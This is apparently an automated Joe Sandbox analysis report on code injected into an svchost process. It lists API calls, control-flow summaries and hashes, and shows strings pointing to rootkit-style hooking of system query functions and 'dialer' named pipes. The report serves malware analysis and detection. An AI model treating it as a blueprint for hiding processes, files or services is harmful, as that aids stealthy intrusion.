                                                                • Part of subcall function 0000026A879C1628: GetProcessHeap.KERNEL32 ref: 0000026A879C1633
                                                                • Part of subcall function 0000026A879C1628: HeapAlloc.KERNEL32 ref: 0000026A879C1642
                                                                • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C16B2
                                                                • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C16DF
                                                                • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C16F9
                                                                • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1719
                                                                • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C1734
                                                                • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1754
                                                                • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C176F
                                                                • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C178F
                                                                • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C17AA
                                                                • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C17CA
                                                              • Sleep.KERNEL32 ref: 0000026A879C1AD7
                                                              • SleepEx.KERNELBASE ref: 0000026A879C1ADD
                                                                • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C17E5
                                                                • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1805
                                                                • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C1820
                                                                • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1840
                                                                • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C185B
                                                                • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C187B
                                                                • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C1896
                                                                • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C18A0
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CloseOpen$HeapSleep$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1534210851-0
                                                              • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                              • Instruction ID: 5eed58e8f7c032d1df488f6ec5371d2936970acb8e97615792f8d803c15a43b0
                                                              • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                              • Instruction Fuzzy Hash: 2931E5F5240A4581FFD0AB26DA493BD73A4ABC4BD0F0454219E09A77DAFF26C491CE1A

                                                              Control-flow Graph

                                                              control_flow_graph (basic blocks 26a8799273c-26a879929d0; rendered graph not reproduced): the entry block calls 26a879929d4 four times, a chain of early-out checks falls through to the exit at 26a879929b2, and a loop from 26a87992845 over 26a87992858 (LoadLibraryA) tests the result at 26a8799286c-26a879928c1 before re-entering at 26a879928ca; a second loop at 26a8799290d-26a8799298c walks a table without imported calls before returning through 26a87992992.
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071488023.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a87990000_svchost.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction ID: 57387411ffdeb412b963753acb60f61000c0759ef6c355c86f1a01fa76b5fc3d
                                                              • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                              • Instruction Fuzzy Hash: B5613532B016908BFB94CF15D10872DF3A6FB54BA4F588121DF59277C8DA39D892CB01

                                                              Control-flow Graph

                                                              control_flow_graph (basic blocks 26a879c2b2c-26a879c2f03; rendered graph not reproduced): the entry calls 26a879e2ce0, a series of argument checks each exit to 26a879c2ee0, then GetModuleHandleA at 26a879c2bc9 (followed by 26a879d6090 when it succeeds) and StrCmpNIW at 26a879c2c14; a loop from 26a879c2c60 compares entries using 26a879c199c, 26a879c1bbc, lstrlenW (26a879c2d4b, 26a879c2e05), the StrCmpIW/StrCmpW helper 26a879c152c and 26a879c3844, and on a match makes up to three calls to 26a879c85c0 (26a879c2e63-26a879c2ec9) before returning.
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                              • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                              • API String ID: 2119608203-3850299575
                                                              • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction ID: 28832ac34e84ece53f7b50bb78eaf8a37b486e288825972d32e086a5872c7075
                                                              • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                              • Instruction Fuzzy Hash: 42B17A76210A9082EFE8DF25D4487AD77A5FB94B84F445026EE0977798EF36CC80CB42
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction ID: 938e5285386ac3705a1524c506204be3636963da77c64c4e1ce6b6d8eddc6828
                                                              • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                              • Instruction Fuzzy Hash: 50315072205B808AEBA0DF60E8847ED7B64F785744F44442AEB4D67B98EF39C548CB11
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 1239891234-0
                                                              • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction ID: d1d1b9292f01f4f5fbfa14a2dc646865464e2607e4ff46e76a86c3c994235719
                                                              • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                              • Instruction Fuzzy Hash: DC318132214F8086EBA0DF25E88439E7BA4F7C9798F540126EA9D53B98EF39C545CF01

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                              • String ID: d
                                                              • API String ID: 2005889112-2564639436
                                                              • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction ID: 07cfe981894990384c0c086665b30c926e9edc38e061a20603f020415e03ff94
                                                              • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                              • Instruction Fuzzy Hash: 70514A76204B8486EB94CF62E54835EBFA1F78AFD9F048124EA4A57758EF3DC049CB01

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentThread$AddressHandleModuleProc
                                                              • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                              • API String ID: 4175298099-1975688563
                                                              • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction ID: dfe63a10a49480e1aef6057fb1ce33c2d81f6763df8e5d6cfa68f1b74ee8636c
                                                              • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                              • Instruction Fuzzy Hash: EF31C8B5144A4AA0FE94EF65E85A7EC3B24F784348FC04013954933176AFBEC289CF92

                                                              Control-flow Graph

                                                              control_flow_graph (basic blocks 26a87996910-26a87996c2c; rendered graph not reproduced): CRT DllMain dispatcher. The checks at 26a87996916-26a87996925 select among a path through __scrt_dllmain_crt_thread_attach (26a87996938), a path at 26a87996945 that runs 26a87996fc0, 26a87996e54, 26a87996ec4, 26a879972dc, 26a87996e0c, 26a87996e38, 26a8799ac0c, __scrt_dllmain_after_initialize_c (26a879969de), 26a8799abc8, 26a87997130, 26a87997180 and 26a87997098, and a path at 26a87996a78 that runs 26a87996e54 followed by either 26a87996f7c/26a87996e1c/26a87997318/26a87997130/26a87997154/26a87996fac or 26a87997190; the blocks from 26a87996b31 onward re-enter 26a87996910 at 26a87996b63 and 26a87996bd5 around calls to 26a8799268c and 26a879a5780.
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071488023.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a87990000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                              • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                              • API String ID: 190073905-1786718095
                                                              • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction ID: b047a768bb49e332fa12a0d509f504b7dc68172f8f015219012fb81a31179565
                                                              • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction Fuzzy Hash: DB81D23170524186FBD0EF65944D39D72E1EB87780F588425AA0977796EF3BC9868F03

                                                              Control-flow Graph

                                                              APIs
                                                              • GetLastError.KERNEL32 ref: 0000026A879CCE37
                                                              • FlsGetValue.KERNEL32(?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCE4C
                                                              • FlsSetValue.KERNEL32(?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCE6D
                                                              • FlsSetValue.KERNEL32(?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCE9A
                                                              • FlsSetValue.KERNEL32(?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCEAB
                                                              • FlsSetValue.KERNEL32(?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCEBC
                                                              • SetLastError.KERNEL32 ref: 0000026A879CCED7
                                                              • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCF0D
                                                              • FlsSetValue.KERNEL32(?,?,00000001,0000026A879CECCC,?,?,?,?,0000026A879CBF9F,?,?,?,?,?,0000026A879C7AB0), ref: 0000026A879CCF2C
                                                                • Part of subcall function 0000026A879CD6CC: HeapAlloc.KERNEL32 ref: 0000026A879CD721
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCF54
                                                                • Part of subcall function 0000026A879CD744: HeapFree.KERNEL32 ref: 0000026A879CD75A
                                                                • Part of subcall function 0000026A879CD744: GetLastError.KERNEL32 ref: 0000026A879CD764
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCF65
                                                              • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCF76
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast$Heap$AllocFree
                                                              • String ID:
                                                              • API String ID: 570795689-0
                                                              • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction ID: fbbfd203b105abf8085660589179a2c6459f60e277cac02fd6d43f7fad114619
                                                              • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                              • Instruction Fuzzy Hash: F941B13234164882FEF8A735565E37D36965BC67B0F640724A936377E6EE2BC8019E03

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                              • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                              • API String ID: 2171963597-1373409510
                                                              • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                              • Instruction ID: b02012d5428b01c1f3b2143805af3d2ef8a5ba1a4c44cc927d8b5d08adb94f93
                                                              • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                              • Instruction Fuzzy Hash: 8C213836618A4082EB50CB25F44836E7BA1F78ABE4F544215EA5913AA8DF7DC189CF02

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                              • Instruction ID: 444f81f33de08ab68ee44032b3efa5b7945037919697de8df49d031d9224469b
                                                              • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                              • Instruction Fuzzy Hash: E2E1C172604B80CAEFA0DF65D58939D77A0F799BA8F100116EE8967B99CB35C581CF02

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071488023.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a87990000_svchost.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                              • Instruction ID: 1f6ce65c737b67c16a74770dcca6a547431568ee9d47403595349a7bcceb887e
                                                              • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                              • Instruction Fuzzy Hash: 97E1D572605B408AFBA0DF65D48839D77B4F7A97A8F100116EE8D67B99DB36C091CF02

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProc
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 3013587201-537541572
                                                              • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                              • Instruction ID: e22ce2f0d6908cfb41650f8e3b1f78ec9287b8d585868ecd0f1c06e4ba5b9ad5
                                                              • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                              • Instruction Fuzzy Hash: 5D41E633311A0091FE96DB56A80CB5D3BA6F785BE0F5941299D0DAB784EE3AC4458B02

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                              • String ID: d
                                                              • API String ID: 3743429067-2564639436
                                                              • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                              • Instruction ID: f1e6073484f6787d024fb048a9424189236bd7d4ebebf72dc42381622d64dea6
                                                              • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                              • Instruction Fuzzy Hash: 76417173214B84C6EBA0CF61E44839E7BA1F389B98F448129EA8917758EF3DC585CB01

                                                              Control-flow Graph

                                                              APIs
                                                              • FlsGetValue.KERNEL32(?,?,?,0000026A879CC7DE,?,?,?,?,?,?,?,?,0000026A879CCF9D,?,?,00000001), ref: 0000026A879CD087
                                                              • FlsSetValue.KERNEL32(?,?,?,0000026A879CC7DE,?,?,?,?,?,?,?,?,0000026A879CCF9D,?,?,00000001), ref: 0000026A879CD0A6
                                                              • FlsSetValue.KERNEL32(?,?,?,0000026A879CC7DE,?,?,?,?,?,?,?,?,0000026A879CCF9D,?,?,00000001), ref: 0000026A879CD0CE
                                                              • FlsSetValue.KERNEL32(?,?,?,0000026A879CC7DE,?,?,?,?,?,?,?,?,0000026A879CCF9D,?,?,00000001), ref: 0000026A879CD0DF
                                                              • FlsSetValue.KERNEL32(?,?,?,0000026A879CC7DE,?,?,?,?,?,?,?,?,0000026A879CCF9D,?,?,00000001), ref: 0000026A879CD0F0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID: 1%$Y%
                                                              • API String ID: 3702945584-1395475152
                                                              • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                              • Instruction ID: 7de55e3907eeb61d84b2ec02f2a106e95853d66b6f36fb83176ce734d1449b23
                                                              • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                              • Instruction Fuzzy Hash: EC11823170868481FEF8A7395A5E37D715A5BC47F0F644324A839277EAEE6AC5028F02
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                              • String ID:
                                                              • API String ID: 190073905-0
                                                              • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction ID: 4ecf39c6d282c13922bf66bcab5b528d166167323d1dc1c22cdb0ae5698a6f63
                                                              • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                              • Instruction Fuzzy Hash: CA81D43160064186FFD0AB2AA94D3AD7B90ABC97C0F5C4425EA4877796EB7BC9458F03
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                              • String ID: api-ms-
                                                              • API String ID: 2559590344-2084034818
                                                              • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                              • Instruction ID: 95f3983436fef2e635cbbbb6f4cfe75cb904a5ec283e5a170f3328164d622b80
                                                              • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                              • Instruction Fuzzy Hash: FE312731316A00E1EF92DB46A80875C3BA4B7A9BB0F590525DD2E2B390EF3AC145CB02
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                              • String ID: CONOUT$
                                                              • API String ID: 3230265001-3130406586
                                                              • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                              • Instruction ID: b5a7c8e5866d3be681c7c72b6341fd08360724eb52cb5406520433ec029d227b
                                                              • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                              • Instruction Fuzzy Hash: A6116D32310B4086E7E0DB56F84831DBEA0F789FE5F444224EA5E97794DF79C8148B41
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcessProtectVirtual$HandleModule
                                                              • String ID: wr
                                                              • API String ID: 1092925422-2678910430
                                                              • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                              • Instruction ID: d5baf2fdec3915ccb6d5ba03a26523055d6eaf36c073b9562141c2a23a4540a2
                                                              • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                              • Instruction Fuzzy Hash: 91115B36704B4182EF949B62F50826D7AB0FB8ABC5F440029EE8D27794EF3EC505CB06
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Thread$Current$Context
                                                              • String ID:
                                                              • API String ID: 1666949209-0
                                                              • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                              • Instruction ID: d9bcf84c3bd1533dc594d755c904efc893949546bab9f2d4fefad5fd87b2f6ed
                                                              • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                              • Instruction Fuzzy Hash: 23D18776208B8882DBB0DB0AE49835E7BA0F3D8B84F540116EA8D57BA9DF7DC541CF41
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID: dialer
                                                              • API String ID: 756756679-3528709123
                                                              • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                              • Instruction ID: 8cc78c2e0b9a0818aac4479415df311af9c6568ae4cde8b4077327d37afdd94e
                                                              • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                              • Instruction Fuzzy Hash: 2231B032701B5582FA94DF16E54876DBBA4FB85BC0F084020EE4867B55EF36C4A18B42
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                              • Instruction ID: a51daef424c37a2d87d3f48ae78d9347c480c631925ac01d6e6589b89c5644b5
                                                              • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                              • Instruction Fuzzy Hash: E611B13130468082FEF4A735965E33D36666BC97F0F500324A83667BDAEE6BC4018E02
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
                                                              Similarity
                                                              • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                              • String ID:
                                                              • API String ID: 517849248-0
                                                              • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                              • Instruction ID: 9a315eb257f643b679e19e597653428afdd5a9ed67b0f0b7c202793297a7241d
                                                              • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                              • Instruction Fuzzy Hash: CB016931300A4082EB94DB52A84C35DBBA1F789BC0F884035EE4963755DF3EC989CB01
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.3071647107.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_26a879c0000_svchost.jbxd
